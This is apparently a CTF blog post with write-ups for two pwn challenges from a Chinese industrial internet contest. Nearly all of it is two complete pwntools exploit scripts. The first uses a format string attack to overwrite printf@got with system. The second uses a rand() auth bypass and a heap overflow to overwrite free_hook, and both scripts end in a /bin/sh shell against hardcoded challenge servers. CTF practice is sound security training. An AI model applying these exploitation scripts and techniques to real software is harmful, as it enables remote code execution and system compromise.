Leof's blog
0%

中国工业互联网大赛-pwn

发表于 更新于 分类于

中国工业互联网大赛-pwn

究极输出

bss段格式化字符串,找两条链子打printf@got

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
from pwn import *
binary = "./pwn"
elf = ELF(binary)
libc = ELF('./libc.so.6')
ip = '39.105.99.40'
port = 35099
local = 1
if local:
    io = process(binary)
else:
    io = remote(ip, port)

context.log_level = "debug"

def debug():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()
_flags = 0xfbad1800


sla(b'HELLO?PWN IT!!!', b'%9$p%6$p')
ru(b'\n')
libcbase = int(io.recv(14), 16) - 0x20840
stack = int(io.recv(14), 16)
lg('libcbase')
lg('stack')


payload = b'%' + str((stack + 0xb0) & 0xffff).encode() + b'c' + b'%10$hn'
sla(b'HELLO?PWN IT!!!', payload)


'''gdb.attach(io, 'b* 0x4011C7')
pause()'''
payload = b'%' + str(0x3390).encode() + b'c' + b'%37$hn'
sla(b'HELLO?PWN IT!!!', payload)

sys_addr = libcbase + libc.sym['system']
lg('sys_addr')


payload = b'%' + str((stack + 0x40) & 0xffff).encode() + b'c' + b'%25$hn'
sla(b'HELLO?PWN IT!!!', payload)

payload = b'%' + str(0x3392).encode() + b'c' + b'%39$hn'
sla(b'HELLO?PWN IT!!!', payload)


payload = b'%' + str(sys_addr >> 16 & 0xff).encode() + b'c' + b'%16$hhn'
payload += b'%' + str((sys_addr & 0xffff) - (sys_addr >> 16 & 0xff)).encode() + b'c' + b'%30$hn'
sla(b'HELLO?PWN IT!!!', payload)

'''gdb.attach(io, 'b* 0x4011c7')
pause()'''
sla(b'HELLO?PWN IT!!!', b'/bin/sh')
ia()

humidCtr

http pwn,把输入格式逆完之后就是一个随机数绕过 + 简单的堆溢出打free_hook

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
from pwn import *
from ctypes import *
binary = "./pwn"
elf = ELF(binary)
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
ip = '1.14.71.254'
port = 28834
local = 1
if local:
    io = process(binary)
else:
    io = remote(ip, port)

context.log_level = "debug"

def debug():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()
_flags = 0xfbad1800

def add(idx, size, con = b'a'):
    sa(b'>', b'POST / HTTP/1.1\r\n' + p8(1) + b'&' + str(idx).encode() + b'&' + str(size).encode() + b'&' + con)

def show(idx):
    sla(b'>', b'POST / HTTP/1.1\r\n' + p8(3) + b'&' + str(idx).encode())

def delete(idx):
    sla(b'>', b'POST / HTTP/1.1\r\n' + p8(4) + b'&' + str(idx).encode())

def edit(idx, con):
    sa(b'>', b'POST / HTTP/1.1\r\n' + p8(2) + b'&' + str(idx).encode() + b'&' + con)

libc.srand(libc.time(0))
result = libc.rand()

sla(b'>', b'DEV / HTTP/1.1\r\n' + p32(result) + b'auth')
sleep(1)
add(0, 0x30)
sleep(1)
show(0)
sleep(1)
libcbase = uu64() - 0x1ecb61
free_hook = libcbase + 0x1eee48

sys_addr = libcbase + 0x52290
lg('libcbase')

add(1, 0x30)
sleep(1)
add(2, 0x30)
sleep(1)
delete(2)
sleep(1)
delete(1)
sleep(1)
edit(0, b'a' * 0x20 + p64(free_hook))
sleep(1)
add(2, 0x30, b'/bin/sh\x00')
sleep(1)
add(3, 0x30, p64(sys_addr))
sleep(1)
delete(2)
ia()